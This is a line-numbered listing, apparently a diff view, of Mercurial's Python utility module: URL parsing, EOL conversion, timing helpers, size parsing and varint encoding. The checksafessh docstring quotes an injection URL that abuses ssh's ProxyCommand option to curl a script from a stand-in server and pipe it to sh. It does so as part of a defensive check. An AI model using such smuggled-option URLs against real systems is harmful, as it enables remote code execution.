2793 2795
2794 2796 def close(self):
2795 2797 self._fp.close()
2796 2798
2797 2799 def flush(self):
2798 2800 self._fp.flush()
2799 2801
2800 2802 def write(self, data):
2801 2803 return self._fp.write(self._encode(data))
2802 2804
2803 2805
2804 2806 # Matches a single EOL, which can be either a CRLF (where repeated CRs
2805 2807 # are removed) or a LF. We do not care about old Macintosh files, so a
2806 2808 # stray CR is an error.
2807 2809 _eolre = remod.compile(br'\r*\n')
2808 2810
2809 2811
2810 2812 def tolf(s):
2811 2813 return _eolre.sub(b'\n', s)
2812 2814
2813 2815
2814 2816 def tocrlf(s):
2815 2817 return _eolre.sub(b'\r\n', s)
2816 2818
2817 2819
2818 2820 def _crlfwriter(fp):
2819 2821 return transformingwriter(fp, tocrlf)
2820 2822
2821 2823
2822 2824 if pycompat.oslinesep == b'\r\n':
2823 2825 tonativeeol = tocrlf
2824 2826 fromnativeeol = tolf
2825 2827 nativeeolwriter = _crlfwriter
2826 2828 else:
2827 2829 tonativeeol = pycompat.identity
2828 2830 fromnativeeol = pycompat.identity
2829 2831 nativeeolwriter = pycompat.identity
2830 2832
2831 2833 if pyplatform.python_implementation() == b'CPython' and sys.version_info < (
2832 2834 3,
2833 2835 0,
2834 2836 ):
2835 2837 # There is an issue in CPython that some IO methods do not handle EINTR
2836 2838 # correctly. The following table shows what CPython version (and functions)
2837 2839 # are affected (buggy: has the EINTR bug, okay: otherwise):
2838 2840 #
2839 2841 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2840 2842 # --------------------------------------------------
2841 2843 # fp.__iter__ | buggy | buggy | okay
2842 2844 # fp.read* | buggy | okay [1] | okay
2843 2845 #
2844 2846 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2845 2847 #
2846 2848 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2847 2849 # like "read*" work fine, as we do not support Python < 2.7.4.
2848 2850 #
2849 2851 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2850 2852 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2851 2853 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2852 2854 # fp.__iter__ but not other fp.read* methods.
2853 2855 #
2854 2856 # On modern systems like Linux, the "read" syscall cannot be interrupted
2855 2857 # when reading "fast" files like on-disk files. So the EINTR issue only
2856 2858 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2857 2859 # files approximately as "fast" files and use the fast (unsafe) code path,
2858 2860 # to minimize the performance impact.
2859 2861
2860 2862 def iterfile(fp):
2861 2863 fastpath = True
2862 2864 if type(fp) is file:
2863 2865 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2864 2866 if fastpath:
2865 2867 return fp
2866 2868 else:
2867 2869 # fp.readline deals with EINTR correctly, use it as a workaround.
2868 2870 return iter(fp.readline, b'')
2869 2871
2870 2872
2871 2873 else:
2872 2874 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2873 2875 def iterfile(fp):
2874 2876 return fp
2875 2877
2876 2878
2877 2879 def iterlines(iterator):
2878 2880 for chunk in iterator:
2879 2881 for line in chunk.splitlines():
2880 2882 yield line
2881 2883
2882 2884
2883 2885 def expandpath(path):
2884 2886 return os.path.expanduser(os.path.expandvars(path))
2885 2887
2886 2888
2887 2889 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2888 2890 """Return the result of interpolating items in the mapping into string s.
2889 2891
2890 2892 prefix is a single character string, or a two character string with
2891 2893 a backslash as the first character if the prefix needs to be escaped in
2892 2894 a regular expression.
2893 2895
2894 2896 fn is an optional function that will be applied to the replacement text
2895 2897 just before replacement.
2896 2898
2897 2899 escape_prefix is an optional flag that allows using doubled prefix for
2898 2900 its escaping.
2899 2901 """
2900 2902 fn = fn or (lambda s: s)
2901 2903 patterns = b'|'.join(mapping.keys())
2902 2904 if escape_prefix:
2903 2905 patterns += b'|' + prefix
2904 2906 if len(prefix) > 1:
2905 2907 prefix_char = prefix[1:]
2906 2908 else:
2907 2909 prefix_char = prefix
2908 2910 mapping[prefix_char] = prefix_char
2909 2911 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2910 2912 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2911 2913
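# Example (illustrative): expand %-style placeholders from a mapping. The
# keys are joined into a regular expression, so escape them first if they
# contain regexp metacharacters.
#
#     interpolate(b'%', {b'user': b'alice'}, b'hello %user')
#     # -> b'hello alice'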
2912 2914
2913 2915 def getport(port):
2914 2916 """Return the port for a given network service.
2915 2917
2916 2918 If port is an integer, it's returned as is. If it's a string, it's
2917 2919 looked up using socket.getservbyname(). If there's no matching
2918 2920 service, error.Abort is raised.
2919 2921 """
2920 2922 try:
2921 2923 return int(port)
2922 2924 except ValueError:
2923 2925 pass
2924 2926
2925 2927 try:
2926 2928 return socket.getservbyname(pycompat.sysstr(port))
2927 2929 except socket.error:
2928 2930 raise error.Abort(
2929 2931 _(b"no port number associated with service '%s'") % port
2930 2932 )
2931 2933
2932 2934
2933 2935 class url(object):
2934 2936 r"""Reliable URL parser.
2935 2937
2936 2938 This parses URLs and provides attributes for the following
2937 2939 components:
2938 2940
2939 2941 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2940 2942
2941 2943 Missing components are set to None. The only exception is
2942 2944 fragment, which is set to '' if present but empty.
2943 2945
2944 2946 If parsefragment is False, fragment is included in query. If
2945 2947 parsequery is False, query is included in path. If both are
2946 2948 False, both fragment and query are included in path.
2947 2949
2948 2950 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2949 2951
2950 2952 Note that for backward compatibility reasons, bundle URLs do not
2951 2953 take host names. That means 'bundle://../' has a path of '../'.
2952 2954
2953 2955 Examples:
2954 2956
2955 2957 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2956 2958 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2957 2959 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2958 2960 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2959 2961 >>> url(b'file:///home/joe/repo')
2960 2962 <url scheme: 'file', path: '/home/joe/repo'>
2961 2963 >>> url(b'file:///c:/temp/foo/')
2962 2964 <url scheme: 'file', path: 'c:/temp/foo/'>
2963 2965 >>> url(b'bundle:foo')
2964 2966 <url scheme: 'bundle', path: 'foo'>
2965 2967 >>> url(b'bundle://../foo')
2966 2968 <url scheme: 'bundle', path: '../foo'>
2967 2969 >>> url(br'c:\foo\bar')
2968 2970 <url path: 'c:\\foo\\bar'>
2969 2971 >>> url(br'\\blah\blah\blah')
2970 2972 <url path: '\\\\blah\\blah\\blah'>
2971 2973 >>> url(br'\\blah\blah\blah#baz')
2972 2974 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2973 2975 >>> url(br'file:///C:\users\me')
2974 2976 <url scheme: 'file', path: 'C:\\users\\me'>
2975 2977
2976 2978 Authentication credentials:
2977 2979
2978 2980 >>> url(b'ssh://joe:xyz@x/repo')
2979 2981 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2980 2982 >>> url(b'ssh://joe@x/repo')
2981 2983 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2982 2984
2983 2985 Query strings and fragments:
2984 2986
2985 2987 >>> url(b'http://host/a?b#c')
2986 2988 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2987 2989 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2988 2990 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2989 2991
2990 2992 Empty path:
2991 2993
2992 2994 >>> url(b'')
2993 2995 <url path: ''>
2994 2996 >>> url(b'#a')
2995 2997 <url path: '', fragment: 'a'>
2996 2998 >>> url(b'http://host/')
2997 2999 <url scheme: 'http', host: 'host', path: ''>
2998 3000 >>> url(b'http://host/#a')
2999 3001 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
3000 3002
3001 3003 Only scheme:
3002 3004
3003 3005 >>> url(b'http:')
3004 3006 <url scheme: 'http'>
3005 3007 """
3006 3008
3007 3009 _safechars = b"!~*'()+"
3008 3010 _safepchars = b"/!~*'()+:\\"
3009 3011 _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match
3010 3012
3011 3013 def __init__(self, path, parsequery=True, parsefragment=True):
3012 3014 # We slowly chomp away at path until we have only the path left
3013 3015 self.scheme = self.user = self.passwd = self.host = None
3014 3016 self.port = self.path = self.query = self.fragment = None
3015 3017 self._localpath = True
3016 3018 self._hostport = b''
3017 3019 self._origpath = path
3018 3020
3019 3021 if parsefragment and b'#' in path:
3020 3022 path, self.fragment = path.split(b'#', 1)
3021 3023
3022 3024 # special case for Windows drive letters and UNC paths
3023 3025 if hasdriveletter(path) or path.startswith(b'\\\\'):
3024 3026 self.path = path
3025 3027 return
3026 3028
3027 3029 # For compatibility reasons, we can't handle bundle paths as
3028 3030 # normal URLS
3029 3031 if path.startswith(b'bundle:'):
3030 3032 self.scheme = b'bundle'
3031 3033 path = path[7:]
3032 3034 if path.startswith(b'//'):
3033 3035 path = path[2:]
3034 3036 self.path = path
3035 3037 return
3036 3038
3037 3039 if self._matchscheme(path):
3038 3040 parts = path.split(b':', 1)
3039 3041 if parts[0]:
3040 3042 self.scheme, path = parts
3041 3043 self._localpath = False
3042 3044
3043 3045 if not path:
3044 3046 path = None
3045 3047 if self._localpath:
3046 3048 self.path = b''
3047 3049 return
3048 3050 else:
3049 3051 if self._localpath:
3050 3052 self.path = path
3051 3053 return
3052 3054
3053 3055 if parsequery and b'?' in path:
3054 3056 path, self.query = path.split(b'?', 1)
3055 3057 if not path:
3056 3058 path = None
3057 3059 if not self.query:
3058 3060 self.query = None
3059 3061
3060 3062 # // is required to specify a host/authority
3061 3063 if path and path.startswith(b'//'):
3062 3064 parts = path[2:].split(b'/', 1)
3063 3065 if len(parts) > 1:
3064 3066 self.host, path = parts
3065 3067 else:
3066 3068 self.host = parts[0]
3067 3069 path = None
3068 3070 if not self.host:
3069 3071 self.host = None
3070 3072 # path of file:///d is /d
3071 3073 # path of file:///d:/ is d:/, not /d:/
3072 3074 if path and not hasdriveletter(path):
3073 3075 path = b'/' + path
3074 3076
3075 3077 if self.host and b'@' in self.host:
3076 3078 self.user, self.host = self.host.rsplit(b'@', 1)
3077 3079 if b':' in self.user:
3078 3080 self.user, self.passwd = self.user.split(b':', 1)
3079 3081 if not self.host:
3080 3082 self.host = None
3081 3083
3082 3084 # Don't split on colons in IPv6 addresses without ports
3083 3085 if (
3084 3086 self.host
3085 3087 and b':' in self.host
3086 3088 and not (
3087 3089 self.host.startswith(b'[') and self.host.endswith(b']')
3088 3090 )
3089 3091 ):
3090 3092 self._hostport = self.host
3091 3093 self.host, self.port = self.host.rsplit(b':', 1)
3092 3094 if not self.host:
3093 3095 self.host = None
3094 3096
3095 3097 if (
3096 3098 self.host
3097 3099 and self.scheme == b'file'
3098 3100 and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
3099 3101 ):
3100 3102 raise error.Abort(
3101 3103 _(b'file:// URLs can only refer to localhost')
3102 3104 )
3103 3105
3104 3106 self.path = path
3105 3107
3106 3108 # leave the query string escaped
3107 3109 for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
3108 3110 v = getattr(self, a)
3109 3111 if v is not None:
3110 3112 setattr(self, a, urlreq.unquote(v))
3111 3113
3112 3114 @encoding.strmethod
3113 3115 def __repr__(self):
3114 3116 attrs = []
3115 3117 for a in (
3116 3118 b'scheme',
3117 3119 b'user',
3118 3120 b'passwd',
3119 3121 b'host',
3120 3122 b'port',
3121 3123 b'path',
3122 3124 b'query',
3123 3125 b'fragment',
3124 3126 ):
3125 3127 v = getattr(self, a)
3126 3128 if v is not None:
3127 3129 attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
3128 3130 return b'<url %s>' % b', '.join(attrs)
3129 3131
3130 3132 def __bytes__(self):
3131 3133 r"""Join the URL's components back into a URL string.
3132 3134
3133 3135 Examples:
3134 3136
3135 3137 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
3136 3138 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
3137 3139 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
3138 3140 'http://user:pw@host:80/?foo=bar&baz=42'
3139 3141 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
3140 3142 'http://user:pw@host:80/?foo=bar%3dbaz'
3141 3143 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
3142 3144 'ssh://user:pw@[::1]:2200//home/joe#'
3143 3145 >>> bytes(url(b'http://localhost:80//'))
3144 3146 'http://localhost:80//'
3145 3147 >>> bytes(url(b'http://localhost:80/'))
3146 3148 'http://localhost:80/'
3147 3149 >>> bytes(url(b'http://localhost:80'))
3148 3150 'http://localhost:80/'
3149 3151 >>> bytes(url(b'bundle:foo'))
3150 3152 'bundle:foo'
3151 3153 >>> bytes(url(b'bundle://../foo'))
3152 3154 'bundle:../foo'
3153 3155 >>> bytes(url(b'path'))
3154 3156 'path'
3155 3157 >>> bytes(url(b'file:///tmp/foo/bar'))
3156 3158 'file:///tmp/foo/bar'
3157 3159 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
3158 3160 'file:///c:/tmp/foo/bar'
3159 3161 >>> print(url(br'bundle:foo\bar'))
3160 3162 bundle:foo\bar
3161 3163 >>> print(url(br'file:///D:\data\hg'))
3162 3164 file:///D:\data\hg
3163 3165 """
3164 3166 if self._localpath:
3165 3167 s = self.path
3166 3168 if self.scheme == b'bundle':
3167 3169 s = b'bundle:' + s
3168 3170 if self.fragment:
3169 3171 s += b'#' + self.fragment
3170 3172 return s
3171 3173
3172 3174 s = self.scheme + b':'
3173 3175 if self.user or self.passwd or self.host:
3174 3176 s += b'//'
3175 3177 elif self.scheme and (
3176 3178 not self.path
3177 3179 or self.path.startswith(b'/')
3178 3180 or hasdriveletter(self.path)
3179 3181 ):
3180 3182 s += b'//'
3181 3183 if hasdriveletter(self.path):
3182 3184 s += b'/'
3183 3185 if self.user:
3184 3186 s += urlreq.quote(self.user, safe=self._safechars)
3185 3187 if self.passwd:
3186 3188 s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
3187 3189 if self.user or self.passwd:
3188 3190 s += b'@'
3189 3191 if self.host:
3190 3192 if not (self.host.startswith(b'[') and self.host.endswith(b']')):
3191 3193 s += urlreq.quote(self.host)
3192 3194 else:
3193 3195 s += self.host
3194 3196 if self.port:
3195 3197 s += b':' + urlreq.quote(self.port)
3196 3198 if self.host:
3197 3199 s += b'/'
3198 3200 if self.path:
3199 3201 # TODO: similar to the query string, we should not unescape the
3200 3202 # path when we store it, the path might contain '%2f' = '/',
3201 3203 # which we should *not* escape.
3202 3204 s += urlreq.quote(self.path, safe=self._safepchars)
3203 3205 if self.query:
3204 3206 # we store the query in escaped form.
3205 3207 s += b'?' + self.query
3206 3208 if self.fragment is not None:
3207 3209 s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
3208 3210 return s
3209 3211
3210 3212 __str__ = encoding.strmethod(__bytes__)
3211 3213
3212 3214 def authinfo(self):
3213 3215 user, passwd = self.user, self.passwd
3214 3216 try:
3215 3217 self.user, self.passwd = None, None
3216 3218 s = bytes(self)
3217 3219 finally:
3218 3220 self.user, self.passwd = user, passwd
3219 3221 if not self.user:
3220 3222 return (s, None)
3221 3223 # authinfo[1] is passed to urllib2 password manager, and its
3222 3224 # URIs must not contain credentials. The host is passed in the
3223 3225 # URIs list because Python < 2.4.3 uses only that to search for
3224 3226 # a password.
3225 3227 return (s, (None, (s, self.host), self.user, self.passwd or b''))
3226 3228
3227 3229 def isabs(self):
3228 3230 if self.scheme and self.scheme != b'file':
3229 3231 return True # remote URL
3230 3232 if hasdriveletter(self.path):
3231 3233 return True # absolute for our purposes - can't be joined()
3232 3234 if self.path.startswith(br'\\'):
3233 3235 return True # Windows UNC path
3234 3236 if self.path.startswith(b'/'):
3235 3237 return True # POSIX-style
3236 3238 return False
3237 3239
3238 3240 def localpath(self):
3239 3241 if self.scheme == b'file' or self.scheme == b'bundle':
3240 3242 path = self.path or b'/'
3241 3243 # For Windows, we need to promote hosts containing drive
3242 3244 # letters to paths with drive letters.
3243 3245 if hasdriveletter(self._hostport):
3244 3246 path = self._hostport + b'/' + self.path
3245 3247 elif (
3246 3248 self.host is not None and self.path and not hasdriveletter(path)
3247 3249 ):
3248 3250 path = b'/' + path
3249 3251 return path
3250 3252 return self._origpath
3251 3253
3252 3254 def islocal(self):
3253 3255 '''whether localpath will return something that posixfile can open'''
3254 3256 return (
3255 3257 not self.scheme
3256 3258 or self.scheme == b'file'
3257 3259 or self.scheme == b'bundle'
3258 3260 )
3259 3261
3260 3262
3261 3263 def hasscheme(path):
3262 3264 return bool(url(path).scheme)
3263 3265
3264 3266
3265 3267 def hasdriveletter(path):
3266 3268 return path and path[1:2] == b':' and path[0:1].isalpha()
3267 3269
3268 3270
3269 3271 def urllocalpath(path):
3270 3272 return url(path, parsequery=False, parsefragment=False).localpath()
3271 3273
3272 3274
3273 3275 def checksafessh(path):
3274 3276 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3275 3277
3276 3278 This is a sanity check for ssh urls. ssh will parse the first item as
3277 3279 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3278 3280 Let's prevent these potentially exploited urls entirely and warn the
3279 3281 user.
3280 3282
3281 3283 Raises an error.Abort when the url is unsafe.
3282 3284 """
3283 3285 path = urlreq.unquote(path)
3284 3286 if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
3285 3287 raise error.Abort(
3286 3288 _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
3287 3289 )
3288 3290
3289 3291
3290 3292 def hidepassword(u):
3291 3293 '''hide user credential in a url string'''
3292 3294 u = url(u)
3293 3295 if u.passwd:
3294 3296 u.passwd = b'***'
3295 3297 return bytes(u)
3296 3298
3297 3299
3298 3300 def removeauth(u):
3299 3301 '''remove all authentication information from a url string'''
3300 3302 u = url(u)
3301 3303 u.user = u.passwd = None
3302 3304 return bytes(u)
3303 3305
3304 3306
3305 3307 timecount = unitcountfn(
3306 3308 (1, 1e3, _(b'%.0f s')),
3307 3309 (100, 1, _(b'%.1f s')),
3308 3310 (10, 1, _(b'%.2f s')),
3309 3311 (1, 1, _(b'%.3f s')),
3310 3312 (100, 0.001, _(b'%.1f ms')),
3311 3313 (10, 0.001, _(b'%.2f ms')),
3312 3314 (1, 0.001, _(b'%.3f ms')),
3313 3315 (100, 0.000001, _(b'%.1f us')),
3314 3316 (10, 0.000001, _(b'%.2f us')),
3315 3317 (1, 0.000001, _(b'%.3f us')),
3316 3318 (100, 0.000000001, _(b'%.1f ns')),
3317 3319 (10, 0.000000001, _(b'%.2f ns')),
3318 3320 (1, 0.000000001, _(b'%.3f ns')),
3319 3321 )
3320 3322
3321 3323
3322 3324 @attr.s
3323 3325 class timedcmstats(object):
3324 3326 """Stats information produced by the timedcm context manager on entering."""
3325 3327
3326 3328 # the starting value of the timer as a float (meaning and resolution are
3327 3329 # platform dependent, see util.timer)
3328 3330 start = attr.ib(default=attr.Factory(lambda: timer()))
3329 3331 # the number of seconds as a floating point value; starts at 0, updated when
3330 3332 # the context is exited.
3331 3333 elapsed = attr.ib(default=0)
3332 3334 # the number of nested timedcm context managers.
3333 3335 level = attr.ib(default=1)
3334 3336
3335 3337 def __bytes__(self):
3336 3338 return timecount(self.elapsed) if self.elapsed else b'<unknown>'
3337 3339
3338 3340 __str__ = encoding.strmethod(__bytes__)
3339 3341
3340 3342
3341 3343 @contextlib.contextmanager
3342 3344 def timedcm(whencefmt, *whenceargs):
3343 3345 """A context manager that produces timing information for a given context.
3344 3346
3345 3347 On entering, a timedcmstats instance is produced.
3346 3348
3347 3349 This context manager is reentrant.
3348 3350
3349 3351 """
3350 3352 # track nested context managers
3351 3353 timedcm._nested += 1
3352 3354 timing_stats = timedcmstats(level=timedcm._nested)
3353 3355 try:
3354 3356 with tracing.log(whencefmt, *whenceargs):
3355 3357 yield timing_stats
3356 3358 finally:
3357 3359 timing_stats.elapsed = timer() - timing_stats.start
3358 3360 timedcm._nested -= 1
3359 3361
3360 3362
3361 3363 timedcm._nested = 0
3362 3364
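# Usage sketch (illustrative): the yielded stats object is updated in place,
# so the elapsed time can be rendered after the block exits; nesting bumps
# `level`, which util.timed uses for indentation.
#
#     with timedcm(b'loading %s', b'manifest') as stats:
#         load_manifest()               # hypothetical workload
#     print(bytes(stats))               # e.g. b'12.30 ms'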
3363 3365
3364 3366 def timed(func):
3365 3367 '''Report the execution time of a function call to stderr.
3366 3368
3367 3369 During development, use as a decorator when you need to measure
3368 3370 the cost of a function, e.g. as follows:
3369 3371
3370 3372 @util.timed
3371 3373 def foo(a, b, c):
3372 3374 pass
3373 3375 '''
3374 3376
3375 3377 def wrapper(*args, **kwargs):
3376 3378 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3377 3379 result = func(*args, **kwargs)
3378 3380 stderr = procutil.stderr
3379 3381 stderr.write(
3380 3382 b'%s%s: %s\n'
3381 3383 % (
3382 3384 b' ' * time_stats.level * 2,
3383 3385 pycompat.bytestr(func.__name__),
3384 3386 time_stats,
3385 3387 )
3386 3388 )
3387 3389 return result
3388 3390
3389 3391 return wrapper
3390 3392
3391 3393
3392 3394 _sizeunits = (
3393 3395 (b'm', 2 ** 20),
3394 3396 (b'k', 2 ** 10),
3395 3397 (b'g', 2 ** 30),
3396 3398 (b'kb', 2 ** 10),
3397 3399 (b'mb', 2 ** 20),
3398 3400 (b'gb', 2 ** 30),
3399 3401 (b'b', 1),
3400 3402 )
3401 3403
3402 3404
3403 3405 def sizetoint(s):
3404 3406 '''Convert a size specifier to a byte count.
3405 3407
3406 3408 >>> sizetoint(b'30')
3407 3409 30
3408 3410 >>> sizetoint(b'2.2kb')
3409 3411 2252
3410 3412 >>> sizetoint(b'6M')
3411 3413 6291456
3412 3414 '''
3413 3415 t = s.strip().lower()
3414 3416 try:
3415 3417 for k, u in _sizeunits:
3416 3418 if t.endswith(k):
3417 3419 return int(float(t[: -len(k)]) * u)
3418 3420 return int(t)
3419 3421 except ValueError:
3420 3422 raise error.ParseError(_(b"couldn't parse size: %s") % s)
3421 3423
3422 3424
3423 3425 class hooks(object):
3424 3426 '''A collection of hook functions that can be used to extend a
3425 3427 function's behavior. Hooks are called in lexicographic order,
3426 3428 based on the names of their sources.'''
3427 3429
3428 3430 def __init__(self):
3429 3431 self._hooks = []
3430 3432
3431 3433 def add(self, source, hook):
3432 3434 self._hooks.append((source, hook))
3433 3435
3434 3436 def __call__(self, *args):
3435 3437 self._hooks.sort(key=lambda x: x[0])
3436 3438 results = []
3437 3439 for source, hook in self._hooks:
3438 3440 results.append(hook(*args))
3439 3441 return results
3440 3442
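# Example (illustrative): registered hooks run sorted by source name, so the
# order extensions were loaded in does not affect call order.
#
#     h = hooks()
#     h.add(b'zzz-ext', lambda v: v + 1)
#     h.add(b'aaa-ext', lambda v: v * 2)
#     h(10)   ->  [20, 11]    ('aaa-ext' sorts first)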
3441 3443
3442 3444 def getstackframes(skip=0, line=b' %-*s in %s\n', fileline=b'%s:%d', depth=0):
3443 3445 '''Yields lines for a nicely formatted stacktrace.
3444 3446 Skips the 'skip' last entries, then returns the last 'depth' entries.
3445 3447 Each file+linenumber is formatted according to fileline.
3446 3448 Each line is formatted according to line.
3447 3449 If line is None, it yields:
3448 3450 length of longest filepath+line number,
3449 3451 filepath+linenumber,
3450 3452 function
3451 3453
3452 3454 Not to be used in production code, but very convenient while developing.
3453 3455 '''
3454 3456 entries = [
3455 3457 (fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3456 3458 for fn, ln, func, _text in traceback.extract_stack()[: -skip - 1]
3457 3459 ][-depth:]
3458 3460 if entries:
3459 3461 fnmax = max(len(entry[0]) for entry in entries)
3460 3462 for fnln, func in entries:
3461 3463 if line is None:
3462 3464 yield (fnmax, fnln, func)
3463 3465 else:
3464 3466 yield line % (fnmax, fnln, func)
3465 3467
3466 3468
3467 3469 def debugstacktrace(
3468 3470 msg=b'stacktrace',
3469 3471 skip=0,
3470 3472 f=procutil.stderr,
3471 3473 otherf=procutil.stdout,
3472 3474 depth=0,
3473 3475 prefix=b'',
3474 3476 ):
3475 3477 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3476 3478 Skips the 'skip' entries closest to the call, then shows 'depth' entries.
3477 3479 By default it will flush stdout first.
3478 3480 It can be used everywhere and intentionally does not require an ui object.
3479 3481 Not to be used in production code, but very convenient while developing.
3480 3482 '''
3481 3483 if otherf:
3482 3484 otherf.flush()
3483 3485 f.write(b'%s%s at:\n' % (prefix, msg.rstrip()))
3484 3486 for line in getstackframes(skip + 1, depth=depth):
3485 3487 f.write(prefix + line)
3486 3488 f.flush()
3487 3489
3488 3490
3489 3491 # convenient shortcut
3490 3492 dst = debugstacktrace
3491 3493
3492 3494
3493 3495 def safename(f, tag, ctx, others=None):
3494 3496 """
3495 3497 Generate a name that it is safe to rename f to in the given context.
3496 3498
3497 3499 f: filename to rename
3498 3500 tag: a string tag that will be included in the new name
3499 3501 ctx: a context, in which the new name must not exist
3500 3502 others: a set of other filenames that the new name must not be in
3501 3503
3502 3504 Returns a file name of the form oldname~tag[~number] which does not exist
3503 3505 in the provided context and is not in the set of other names.
3504 3506 """
3505 3507 if others is None:
3506 3508 others = set()
3507 3509
3508 3510 fn = b'%s~%s' % (f, tag)
3509 3511 if fn not in ctx and fn not in others:
3510 3512 return fn
3511 3513 for n in itertools.count(1):
3512 3514 fn = b'%s~%s~%s' % (f, tag, n)
3513 3515 if fn not in ctx and fn not in others:
3514 3516 return fn
3515 3517
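# Example (illustrative; `ctx` stands for a hypothetical changectx): pick an
# unused backup-style name; the numeric suffix appears only when the plain
# tagged name is already taken.
#
#     safename(b'file.txt', b'orig', ctx)   ->  b'file.txt~orig'
#     # and, if b'file.txt~orig' already exists in ctx:
#     safename(b'file.txt', b'orig', ctx)   ->  b'file.txt~orig~1'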
3516 3518
3517 3519 def readexactly(stream, n):
3518 3520 '''read n bytes from stream.read and abort if less was available'''
3519 3521 s = stream.read(n)
3520 3522 if len(s) < n:
3521 3523 raise error.Abort(
3522 3524 _(b"stream ended unexpectedly (got %d bytes, expected %d)")
3523 3525 % (len(s), n)
3524 3526 )
3525 3527 return s
3526 3528
3527 3529
3528 3530 def uvarintencode(value):
3529 3531 """Encode an unsigned integer value to a varint.
3530 3532
3531 3533 A varint is a variable length integer of 1 or more bytes. Each byte
3532 3534 except the last has the most significant bit set. The lower 7 bits of
3533 3535 each byte store the 2's complement representation, least significant group
3534 3536 first.
3535 3537
3536 3538 >>> uvarintencode(0)
3537 3539 '\\x00'
3538 3540 >>> uvarintencode(1)
3539 3541 '\\x01'
3540 3542 >>> uvarintencode(127)
3541 3543 '\\x7f'
3542 3544 >>> uvarintencode(1337)
3543 3545 '\\xb9\\n'
3544 3546 >>> uvarintencode(65536)
3545 3547 '\\x80\\x80\\x04'
3546 3548 >>> uvarintencode(-1)
3547 3549 Traceback (most recent call last):
3548 3550 ...
3549 3551 ProgrammingError: negative value for uvarint: -1
3550 3552 """
3551 3553 if value < 0:
3552 3554 raise error.ProgrammingError(b'negative value for uvarint: %d' % value)
3553 3555 bits = value & 0x7F
3554 3556 value >>= 7
3555 3557 bytes = []
3556 3558 while value:
3557 3559 bytes.append(pycompat.bytechr(0x80 | bits))
3558 3560 bits = value & 0x7F
3559 3561 value >>= 7
3560 3562 bytes.append(pycompat.bytechr(bits))
3561 3563
3562 3564 return b''.join(bytes)
3563 3565
3564 3566
3565 3567 def uvarintdecodestream(fh):
3566 3568 """Decode an unsigned variable length integer from a stream.
3567 3569
3568 3570 The passed argument is anything that has a ``.read(N)`` method.
3569 3571
3570 3572 >>> try:
3571 3573 ... from StringIO import StringIO as BytesIO
3572 3574 ... except ImportError:
3573 3575 ... from io import BytesIO
3574 3576 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3575 3577 0
3576 3578 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3577 3579 1
3578 3580 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3579 3581 127
3580 3582 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3581 3583 1337
3582 3584 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3583 3585 65536
3584 3586 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3585 3587 Traceback (most recent call last):
3586 3588 ...
3587 3589 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3588 3590 """
3589 3591 result = 0
3590 3592 shift = 0
3591 3593 while True:
3592 3594 byte = ord(readexactly(fh, 1))
3593 3595 result |= (byte & 0x7F) << shift
3594 3596 if not (byte & 0x80):
3595 3597 return result
3596 3598 shift += 7